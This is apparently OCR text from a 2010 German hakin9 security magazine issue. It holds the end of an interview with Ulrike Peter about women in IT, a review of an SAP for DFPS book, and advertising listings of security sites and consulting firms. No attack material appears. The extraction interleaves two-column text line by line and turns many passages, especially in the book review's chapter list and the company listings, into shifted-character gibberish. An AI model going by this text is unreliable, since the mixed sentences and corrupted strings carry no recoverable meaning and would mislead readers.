gel herrscht, sind meiner Meinung nach: Ihnen fehlt schaft aber eine Entwicklung durch und dies reguliert
manchmal der Mut, sie erhalten nicht immer die glei- sich sicherlich zumindest ein Stück weit im Laufe der
chen Chancen oder – und das wird der Hauptgrund sein nächsten Jahre.
– es liegen schlichtweg die Interessen in anderen Be-
reichen. hakin9: Was macht Ihnen am meisten Spaß bei der
Arbeit in der IT-Branche?
hakin9: Woraus resultieren die Vorurteile gegen die Ulrike Peter: Bevor ich mich selbständig machte, war
Frauen, die sich mit Computern beschäftigen? ich bereits in einem anderen Unternehmen in der Ge-
Ulrike Peter: Die IT ist (und bleibt es sicher auch) eine schäftsleitung tätig – jedoch konnte ich den Stift zum
Männerdomäne – Frauen in der IT-Branche sind Para- Schreiben nie aus der Hand legen. Es reizt mich, im-
diesvögel. Wie in allen Berufen, in denen seit jeher ein mer wieder neue technologische Themen zu erkunden
Geschlecht etabliert ist, sich Prozesse eingeschliffen und dabei nicht nur an der Oberfläche zu kratzen, son-
und bewährt haben, ist es erst einmal fremd und ge- dern Detailtiefe zu erlangen, um fundiert und lesens-
wöhnungsbedürftig, wenn sie sich verändern. So liegen wert über ein Thema berichten zu können. Im Laufe
die Vorurteile zum einen daran, dass es nicht üblich ist, der Jahre habe ich eine starke Affinität zur IT-Security
wenn Frauen in diesen Berufen arbeiten und Männern entwickelt. Ich finde es spannend, über Sicherheits-
die „Technik“ zugeordnet wird – zum anderen resultie- lücken, Verschlüsselungstechniken und vieles weite-
ren sie daraus, dass die unterschiedlichen Fähigkeiten re zu schreiben. Darüber hinaus macht es mir großen
und Interessen der Geschlechter einfach naturgege- Spaß, IT-Unternehmen durch die richtige PR-Strategie
ben sind. So wie kleine Jungen mit Autos spielen und nach vorn zu bringen und entsprechende Maßnahmen
Mädchen mit Puppen, stecken auch später gewisse in die Tat umsetzen. Beim Kennenlernen eines poten-
Verhaltensweisen und Interessen in uns, die bereits in ziellen Neukunden im ersten Moment manchmal hin-
der Kindheit geprägt werden. Greift das weibliche Ge- sichtlich der technischen Fachkompetenz unterschätzt
schlecht im Berufsleben plötzlich zum „Auto“, so ist dies zu werden und dann schnell durch Know-how zu über-
ungewöhnlich und wird erst einmal hinterfragt. zeugen, bestätigt mich immer wieder in dem, was ich
tue.
hakin9: Wie sieht die Situation von Frauen in der IT-
Branche aus? Ist es leicht, als begabte IT-Expertin hakin9: Was sollte unternommen werden, um
einen Job in einem Unternehmen zu bekommen? die Ressentiments von Frauen gegenüber IT-Jobs
Ulrike Peter: Frauen in der IT-Branche sind häufig in abzubauen?
Marketingabteilungen zu finden – aber zum Beispiel Ulrike Peter: Ich glaube, dem kann man bzw. Frau nur
auch bei der schreibenden Zunft in Fachverlagen. In entgegenwirken, indem sie den Mut hat, ihre Interessen
diesen Jobs herrscht in meinen Augen Chancengleich- zu verfolgen und sie unter Beweis zu stellen. Aus Er-
heit. Als IT-Expertin in einem technischen Beruf wie Ad- fahrung: wenn jemand seine Fähigkeiten zeigt und en-
ministrator, Entwickler oder Ähnliches sieht es dagegen gagiert an eine Sache herangeht, rückt das Geschlecht
anders aus. In diesem Segment haben es weibliche automatisch in den Hintergrund.
Fachkräfte meiner Ansicht nach schwerer. Die Hürde,
zum Bewerbungsgespräch eingeladen zu werden, ist Wir bedanken uns für das Gespräch!
höher. Bekommt sie die Chance dazu, wird vielleicht et-
was genauer hingeschaut, aber letztlich zählt die Kom-
petenz, die unterm Strich den entscheidenden Aus-
schlag geben wird.

hakin9: Wie werden Frauen von Männern als ihre


Mitarbeiter wahrgenommen?
Ulrike Peter: Dies lässt sich nicht pauschalisieren
und richtet sich zum einen nach der Einstellung des

hakin9.org/de 45
REZENSIONEN

SAP for DFPS


Implementierung
und Customizing
Galileo Press, Bonn 2010
1. Auflage 2010
Autoren:
Bernhard Escherich
Heinrich Pfriemer
Wolfgang Ullwer
as Buch SAP for DFPS Implementierung und

D
Hervorheben sollte man die organisatorische Flexi-
Customizing, basiert auf mehr als 20 Jahren Er- bilität und Logistik wie das Logistic Assessment, Pro-
fahrung die die Autoren insgesamt bei der Ent- zessmanagement, Qualification Management inkl. der
wicklung, Implementierung, aber auch Schulung der Übernahme von Trainingsdaten, das Managementkon-
Lösung sammeln konnten. zept BSC (Balanced Scorcard), die Einsatzmöglichkei-
Die über 650 Seiten vollgepacktes Wissen sollten sie ten von mobilen Anwendungen für Schutzaufgaben,
nicht abschrecken dieses Buch in die Hand zu nehmen. SOA und NCW bzw. NetFüOp mit DFPS.
Es ist sehr gut und flüssig geschrieben. Man schafft es, Der Mehrwert wird z.B. am Meldewesen der NC3A
sollten sie ein schneller LeserIn sein in zwei Tagen. durch Automatisierung von weiten Teilen, schön heraus
Sie benötigen keine tiefgreifenden SAP-Kenntnisse gearbeitet.
zum Verständnis, daher ist es für Entscheider genauso Die ausführlichen bebilderten Beispiele, stellen eine
geeignet wie für Projektleiter, Architekten, funktionale gelungene Verbindung zwischen Theorie und Praxis
Mitarbeiter, Basismitarbeiter oder externe Berater. bzw. Anwendung dar. In der SAP-typischen Struktur
Komplexe Zusammenhänge werden sehr schön und wurden die neuen und bereits erwähnten Funktionen
bildhaft beschrieben, damit auch für den SAP-Laien, sinnvoll und gekonnt integriert.
das Vorgehen verständlich beschrieben wird. Erwäh- Des Weiteren findet sich für die richtige IT-Architektur
nenswert finde ich in diesem Zusammenhang Rubiks ein schön gefüllter Werkzeugkasten mit den dazuge-
Zauberwürfel. hörigen Do’s and Dont’s. Natürlich darf auch das best
Das Buch ist sehr strukturiert aufgebaut und practices nicht fehlen, sowie der Ausblick auf zukünftige
umfasst unverzichtbare Grundlagen in den Teilen I-III. Entwicklungen.
Für Experten wird es dann in Teil IV richtig spannend Egal ob sie sich für eine Neuintegration oder eine Co-
und interessant. re2Defense Lösung entscheiden,
Die von SAP entwickelte fast eierlegende Wollmilch- die Kapitel zu den Themen:
sau, erfordert ein umfangreiches Nachschlagewerk, zur
Implementierung. Den Autoren ist dies hiermit gelun- ‡ /RJLVWLN!161XQG,8,'
gen. ‡ /RJLVWLN!+HUVWHOOHUWHLOHQXPPHUQ
Ihnen ist es außerdem gelungen aufzuzeigen, wie ‡ ,QVWDQGKDOWXQJ!7HFKQLVFKH3OlW]HXQG
komplexe „Unternehmensstrukturen“ bewältigt und Kos- ‡ 5ROOHQLP')363URMHNW
ten reduziert und kontrolliert werden können.
Das Beispielprojekt „Tsunami“ verdeutlicht dabei an möchte ich ihnen unbedingt ans Herz legen.
einem nicht so komplexen Projekt die Anforderungen.
Beleuchtet wird z.B. wie militärische Kernprozesse, wie FAZIT:
etwa die Logistik substanzielle Einsparungen von ca. Dieses Buch sollte keinem Entscheider und IT-Verant-
30% erzielen könnten, als auch die Unterstützung von wortlichen vorenthalten werden.
Einsätzen verbessert werden könnten (Beschleunigung Prädikat besonders empfehlenswert.
der Verlegung um bis zu 50 -70%).
Des Weiteren wird die Interoperabilität sehr schön he- Autor: Nicole Huck
raus gestellt und die integrativen Aspekte stets im Blick
behalten.

46 10/2010
Recommended Sites

Datenschutz ist EU-weit gesetzliche Anforde- Die Netzwerktechnik steht auf www.easy-ne- Die Seed Forensics GmbH bietet für Strafver-
rung. Wir sorgen für die Erfüllung rechtlicher twork.de im Mittelpunkt. Artikel, Tutorials und folgungsbehörden professionelle Unterstützung
Vorschriften und kümmern uns um ein ange- ein Forum bieten genügen Stoff für kommende in den Bereichen der Datensicherstellung und
messenes Datenschutzniveau in Ihrem Unter- $GPLQLVWUDWRUHQXQG1HW]ZHUNSUR¿V Datenträgerauswertung. Selbstverständlich
nehmen, auch international. entsprechen unsere Mitarbeiter, unser tech-
www.blossey-partner.de www.easy-network.de nisches Equipment und auch unsere Räumli-
chkeiten den notwendigen Anforderungen.
www.seed-forensics.de

Securitymanager.de ist eine Produktion des Happy-Security ist ein neues Portal mit Secu- +LHU ¿QGHVW 'X DOOHV ZDV GDV +HU] HLQHV
Online-Verlag FEiG & PARTNER. Seit dem rity-Challanges, IT-Quiz, Web-Bibliothek, Multi- Computerfreaks höher schlagen lässt: Geek
Start hat sich Securitymanager.de zu einem media-Center & vielen weiteren Features. Wear mit intelligenten Sprüchen, eine riesige
führenden Online-Informationsportal in www.happy-security.de Auswahl Gadgets und natürlich auch viele
Deutschland entwickelt und versteht sich als Hacker Tools.
unabhängiger Informationsdienstleister der www.getDigital.de
IT- und Information-Security-Branche.
www.securitymanager.de

CloudSafe stellt seinen Nutzern eine Plattform AV-Comparatives geht hervor aus dem Inns-
zur kryptographisch sicheren Ablage und Verwal- brucker Kompetenzzentrum und gilt als eines
Pericom base camp IT-Security: Unser Ziel ist
tung von sensiblen Daten zur Verfügung: Nutzer der bekanntesten unabhängigen Testhäuser
es, unsere Kunden vor möglichen Gefahren
können auf CloudSafe beliebig viele Dokumente für Antiviren-Software.
für Ihre IT-Infrastruktur bestmöglich zu schüt-
in virtuellen Safes ablegen. Es können weite- www.av-comparatives.org
zen. Neben der Analyse von Risikopotentia-
ren Personen individuelle Zugriffsrechte auf die
len durch Security Audits bieten wir, durch
Safes eingeräumt und somit ein sicherer Daten-
die Implementierung von Security-Lösungen,
austausch ermöglicht werden.
Schutz vor konkreten Gefahren.
www.cloudsafe.com
www.pericom.at

Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: de@hakin9.org


Recommended Companies

Mabunta secXtreme GmbH


'LH PDEXQWD *PE+ DJLHUW DOV KRFK schützt Ihre Web-Anwendungen bis
spezialisierter und kompetenter Partner auf Applikationsebene. Dazu gehört
UXQG XP ,76HFXULW\ XQG 1HW]ZHUN/| sowohl die Prüfung von Applikationen
VXQJHQ:LUXQWHUVWW]HQEHL,76LFKHU (Pentests und Code-Reviews) als auch
heitsfragen in allen Unternehmens- Beratungsleistungen für Sicherheit im
bereichen, verbinden Wachstum mit Entwicklungsprozess und Schutzlö-
sicherer Kommunikation. sungen (Web Application Firewalls) bei
Alles in allem- mabunta „one-face-to- *UR‰XQWHUQHKPHQXQGGHPJHKREHQHQ
the-customer“, Ihr Spezialist in Fragen Mittelstand.
GHU,76LFKHUKHLW
www.sec-Xtreme.com
www.mabunta.de

B1 Systems
SEC Consult Die B1 Systems ist international tätig
SEC Consult ist der führende Berater
SEC Consult für Information Security Consulting in
in den Bereichen Linux/Open Source
&RQVXOWLQJ 7UDLQLQJ XQG 6XSSRUW B1
Zentraleuropa. Die vollständige Unab-
Systems spezialisiert sich in den Be-
hängigkeit von SW- und HW-Herstellern
reichen Virtualisierung und Cluster.
macht uns zum echten Advisor unserer
Kunden. Unsere Dienstleistungen umfa-
info@b1-systems.de
ssen externe/interne Sicherheitsaudits,
www.b1-systems.de
(Web-) Applikationssicherheit (ONR 17-
700), Sicherheitsmanagement-Prozesse
(ISO 27001) etc.
www.sec-consult.com

Tele-Consulting GmbH Blossey & Partner


9RP%6,DNNUHGLWLHUWHV3UÀDERUIU,7 Consulting Datenschutzbüro
Sicherheit, hakin9 und c’t Autoren, jah- Datenschutz ist EU-weit gesetzliche An-
relange Erfahrung bei der Durchführung forderung. Wir sorgen für die Erfüllung
von Penetrationstests und Security-Au- rechtlicher Vorschriften und kümmern
dits, eigener Security Scanner „tajanas”, uns um ein angemessenes Daten-
Sicherheitskonzepte, Risikoanalysen, schutzniveau in Ihrem Unternehmen,
,7*UXQGVFKXW]%HUDWXQJ  OL]HQ]LHUWH auch international. Wir erledigen alle er-
ISO 27001-Auditoren, VoIP-Planung forderlichen Aufgaben, die Fäden behal-
und -Security ten Sie in der Hand. Nutzen Sie unser
Erstberatungsgespräch.
www.tele-consulting.com
www.blossey-partner.de
Recommended Companies

NESEC m-privacy GmbH


NESEC ist Ihr Spezialist für Penetra- ,76LFKHUKHLWVO|VXQJHQ±IXQNWLRQDOXQG
tionstests, Sicherheitsanalysen und einfach zu bedienen!
,76HFXULW\ &RXQVXOWLQJ 'DV 1(6(& So präsentieren sich die von m-privacy
3HQWHVW7HDP XQWHUVWW]W 6LH EHL 6L HQWZLFNHOWHQ 7LJKW*DWHŒ6HUYHU ]%
cherheitsprüfungen Ihrer Netzwerke 7LJKW*DWHŒ3UR PLW 'DWHQVFKXW]*
und Webapplikationen sowie bei Sour- tesiegel. Es bietet als erstes System
ce Code Audits. Bei Bedarf optimieren weltweit einen kompletten Schutz vor
wir Ihre Policy, sensibilisieren Ihre Online-Spionage, Online-Razzien und
0LWDUEHLWHU XQG ]HUWL¿]LHUHQ ,KU 8QWHU gezielten Angriffen!
nehmen nach ISO 27001.
www.m-privacy.de
www.nesec.de

Seed Forensics GmbH


'LH 6HHG )RUHQVLFV *PE+ ELHWHW OPTIMAbit GmbH
für Strafverfolgungsbehörden profe- Wir sind Spezialisten für Entwicklung
ssionelle Unterstützung in den XQG 6HFXULW\ :LU VLFKHUQ -DYD 1(7
Bereichen der Datensicherstellung und Mobile Applikationen gegen Angriffe
und Datenträgerauswertung. Selbst- externer und interner Art. Unsere Dien-
verständlich entsprechen unsere ste umfassen Audits, Code Reviews,
Mitarbeiter, unser technisches Equip- Penetrationstest, sowie die Erstellung
0ment und auch unsere Räumlichkeiten von Policies. Zusätzlich bieten wir Semi-
den notwendigen Anforderungen. QDUH]XVLFKHUKHLWVUHOHYDQWHQ7KHPHQ

www.seed-forensics.de www.optimabit.com

Protea Networks secadm


3URWHD LVW VSH]LDOLVLHUW DXI ,76HFXULW\ secadm ist durchtrainierter Spezialist für
Lösungen: Verschlüsselung, Firewall/ Airbags, ABS und Sicherheitsgurte in der
931 $XWKHQWL¿]LHUXQJ &RQWHQW)LOWH ,7 =HKQ ,76LFKHUKHLWVH[SHUWHQ PLW 
ring, etc. Wir bieten umfassende Bera- Mannjahren Erfahrung beraten, entwi-
tung, Vertrieb von Security-Hard- und FNHOQ XQG LPSOHPHQWLHUHQ ,7/|VXQJHQ
Software, Installation und umfangreiche für Kunden weltweit. Der Fokus liegt da-
'LHQVWOHLVWXQJHQ ]%.RQ]HSWLRQ7UDL EHLDXI7KHPHQZLH3UR]HVV2SWLPLHUXQJ
nings). Protea setzt auf Lösungen der und Security-Management. Risiko-Analy-
0DUNW XQG 7HFKQRORJLHIKUHU XQG KlOW se, die Sicherheitsberatung, Auditing, Se-
dafür direkten inhouse-Support bereit. curity-Leitfäden, Software-Entwicklung,
5HSRUWLQJELV]XP7UDLQLQJ
www.proteanetworks.de www.secadm.de

SecureNet GmbH, München underground_8


Als Softwarehaus und Web Application
secure computing gmbh
Security Spezialist bieten wir Expertise
Wir entwickeln und vertreiben securi-
rund um die Sicherheit von Webanwen-
W\ DSSOLDQFHV IU GLH %HUHLFKH 8QL¿HG
dungen: Anwendungs-Pentests, Sour-
7KUHDW 0DQDJHPHQW 7UDI¿F 6KDSLQJ
FHFRGHDQDO\VHQ 6HFXUH &RGLQJ *XL
und Antispam. Unsere Lösungen sind
delines, Beratung rund um den Software
hardwarebasiert und werden über Dis-
'HYHORPHQW/LIHF\FOH7RROV$SSOLFDWLRQ
tributoren, Reseller und Systemintegra-
Firewalls, Application Scanner, Fortify
toren implementiert und vertrieben.
6&$'HIHQGHU7UDFHU
www.underground8.com
www.securenet.de